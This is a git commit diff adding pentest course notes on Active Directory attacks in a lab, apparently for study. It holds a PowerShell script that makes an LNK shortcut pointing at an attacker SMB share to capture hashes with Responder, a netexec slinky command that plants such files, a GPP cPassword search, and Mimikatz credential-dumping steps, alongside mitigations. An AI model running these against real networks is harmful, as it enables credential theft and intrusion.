feat: new ad attack notes

Author: syselement

peh/4-active-directory/.gitbook/assets/2025-02-15_09-35-18_881.png

@@ -21,6 +21,13 @@
 - Built-in MSSQL auth server
 - ... more ...
 
+```bash
+# (Re)-Install
+sudo apt autoremove --purge responder -y && sudo apt autoclean
+sudo rm -rf /usr/share/responder/
+sudo apt install responder -y
+```
+
 ```bash
 sudo responder -I eth0 -dPv
 ```

peh/4-active-directory/.gitbook/assets/2025-02-15_10-30-03_883.png

@@ -65,6 +65,7 @@ export creds detailed cme_creds
 ```bash
 sudo apt install pipx git
 pipx ensurepath
+pipx uninstall netexec
 pipx install git+https://github.com/Pennyw0rth/NetExec
 ```
 
@@ -116,6 +117,12 @@ hashcat -m 1000 ntlm.txt /usr/share/wordlists/rockyou.txt
 	7facdc498ed1680c4fd1448319a8c04f:Password1!
 ```
 
+For mitigation:
+
+- Avoid re-using local admin passwords
+- Disable guest and administrator accounts
+- Use Privilege Access Management (PAM)
+
 ---
 
 ## Kerberoasting
@@ -232,3 +239,139 @@ For mitigation:
 
 ---
 
+## LNK File Attack
+
+An attacker can place a malicious file in a shared folder, and when triggered, it captures password hashes using a tool like Responder, similar to a **watering hole attack** where a compromised website delivers malware that can drop such files onto a target's network.
+
+📌 Open Powershell on the `THEPUNISHER` (`192.168.31.93`) VM.
+
+- The following PowerShell script creates a shortcut (`C:\test.lnk`) pointing to a remote file (`\\192.168.31.131\@test.png` - on the attacker VM), setting its icon, description, and a `Ctrl+Alt+T` hotkey. It can be used for automation or to trick users into accessing a remote resource, potentially leaking credentials via an SMB request.
+
+```powershell
+$objShell = New-Object -ComObject WScript.shell
+$lnk = $objShell.CreateShortcut("C:\test.lnk")
+$lnk.TargetPath = "\\192.168.31.131\@test.png"
+$lnk.WindowStyle = 1
+$lnk.IconLocation = "%windir%\system32\shell32.dll, 3"
+$lnk.Description = "Test"
+$lnk.HotKey = "Ctrl+Alt+T"
+$lnk.Save()
+```
+
+- rename the `test.lnk` file into `@test.lnk` to put it on top of the folder list
+- copy the file in `\\hydra-dc\hackme` file share
+
+Run Responder (on Kali VM):
+
+```bash
+sudo responder -I eth0 -dPv
+```
+
+No just open the `\\hydra-dc\hackme` share folder in `THEPUNISHER` VM and check the Responder log for hashes automatically captured.
+
+![](.gitbook/assets/2025-02-15_09-35-18_881.png)
+
+**Automated attack** - ff the file share is exposed, use `netexec` [slinky](https://github.com/seriotonctf/cme-nxc-cheat-sheet?tab=readme-ov-file#slinky) built-in module to create the link/shortcut file on the targeted VM (in all shares with write permissions).
+
+```bash
+netexec smb 192.168.31.131 -d marvel.local -u fcastle -p Password1 -M slinky -o NAME=test SERVER=192.168.31.90
+```
+
+---
+
+## GPP Attacks - cPassword Attacks
+
+The Group Policy Preferences (**GPP**) allowed admins to create policies with embedded credentials.
+
+- credentials were encrypted and stored in the **cPassword** field
+- **encryption key** was leaked, making it possible to decrypt stored credentials
+- patched in [MS14-025](https://learn.microsoft.com/en-us/security-updates/securitybulletins/2014/ms14-025), but previously stored credentials remain vulnerable, so it is still relevant for pentesting
+
+```cmd
+findstr /S /I cpassword \\marvel.local\sysvol\marvel.local\policies\*.xml
+```
+
+For mitigation:
+
+- Install `KB2962486` on every computer used to manage GPOs which prevents new credentials from being placed in Group Policy Preferences.
+- Delete existing GPP `xml` files in SYSVOL containing passwords.
+
+Good article - [Finding Passwords in SYSVOL & Exploiting Group Policy Preferences – Active Directory Security](https://adsecurity.org/?p=2288)
+
+---
+
+## Credential dumping with Mimikatz
+
+➡️ [Mimikatz](https://www.kali.org/tools/mimikatz/) - a tool that allows the extraction of plaintext passwords, hashes, PIN codes and Kerberos tickets from memory. It can also perform **pass-the-hash**, **pass-the-ticket** or build **Golden** tickets.
+
+📌 Turn on `SPIDERMAN` (`192.168.31.92`) and login with `peterparker` with the attached `hackme` file-share.
+
+```bash
+mkdir -p $HOME/tcm/peh/ad-attacks/mimikats
+cd $HOME/tcm/peh/ad-attacks/mimikats
+wget https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20220919/mimikatz_trunk.zip
+# extract zip
+python3 -m http.server 80
+```
+
+- Open `http://192.168.31.131/mimikatz_trunk/x64/` in the `SPIDERMAN` VM and download all the 4 files inside that directory
+- Run `cmd` as admin
+
+```bash
+cd "C:\Users\peterparker\Downloads"
+mimikatz.exe
+
+# Commands
+privilege::
+privilege::debug
+
+# Attacks
+sekurlsa::
+             msv  -  Lists LM & NTLM credentials
+         wdigest  -  Lists WDigest credentials
+        kerberos  -  Lists Kerberos credentials
+           tspkg  -  Lists TsPkg credentials
+         livessp  -  Lists LiveSSP credentials
+         cloudap  -  Lists CloudAp credentials
+             ssp  -  Lists SSP credentials
+  logonPasswords  -  Lists all available providers credentials
+         process  -  Switch (or reinit) to LSASS process  context
+        minidump  -  Switch (or reinit) to LSASS minidump context
+         bootkey  -  Set the SecureKernel Boot Key to attempt to decrypt LSA Isolated credentials
+             pth  -  Pass-the-hash
+          krbtgt  -  krbtgt!
+     dpapisystem  -  DPAPI_SYSTEM secret
+           trust  -  Antisocial
+      backupkeys  -  Preferred Backup Master keys
+         tickets  -  List Kerberos tickets
+           ekeys  -  List Kerberos Encryption Keys
+           dpapi  -  List Cached MasterKeys
+         credman  -  List Credentials Manager
+
+sekurlsa::logonPasswords
+```
+
+![](.gitbook/assets/2025-02-15_10-30-03_883.png)
+
+- Check for clear-text passwords based on the mounted shared folder for example.
+- Check for NTLM hashes.
+- **Mimikatz needs obfuscation and/or antivirus bypass to work on protected systems.**
+
+---
+
+## 📌 **Attack strategy for internal pentest**
+
+- Account compromised
+- Quick wins:
+  - Pass the hash
+  - Secrets dump
+  - Pass the hash/password
+- Dig deeper:
+  - Enumerate (Bloodhound, users, domain admins, sensitive VMs, etc)
+  - Account access
+  - Old vulnerabilities
+- **"Think outside the box"**
+  - *How can I move laterally until I can move vertically?*
+
+---
+

peh/4-active-directory/2-ad-init-vectors.md

@@ -1 +1,2 @@
-# AD - Additional Attacks
+# AD - Additional Attacks
+

peh/4-active-directory/4-ad-attacks.md

@@ -186,6 +186,13 @@
 
 - [Token Impersonation | Pentest Everything](https://viperone.gitbook.io/pentest-everything/everything/everything-active-directory/access-token-manipultion/token-impersonation)
   - [Fun with Incognito - Metasploit Unleashed](https://www.offsec.com/metasploit-unleashed/fun-incognito/)
+- [Forced Authentication | Red Team Notes](https://www.ired.team/offensive-security/initial-access/t1187-forced-authentication)
+- [Finding Passwords in SYSVOL & Exploiting Group Policy Preferences – Active Directory Security](https://adsecurity.org/?p=2288)
+  - [MS14-025: Vulnerability in Group Policy Preferences could allow elevation of privilege: May 13, 2014 - Microsoft Support](https://support.microsoft.com/en-us/topic/ms14-025-vulnerability-in-group-policy-preferences-could-allow-elevation-of-privilege-may-13-2014-60734e15-af79-26ca-ea53-8cd617073c30)
+  - [Exploiting-GPP-AKA-MS14_025-vulnerability](https://github.com/incredibleindishell/Windows-AD-environment-related/blob/master/Exploiting-GPP-AKA-MS14_025-vulnerability/README.md)
+  - [GPP attacks | Internal Pentest](https://xedex.gitbook.io/internalpentest/internal-pentest/active-directory/post-compromise-attacks/gpp-attacks)
+
+- [mimikatz](https://github.com/gentilkiwi/mimikatz)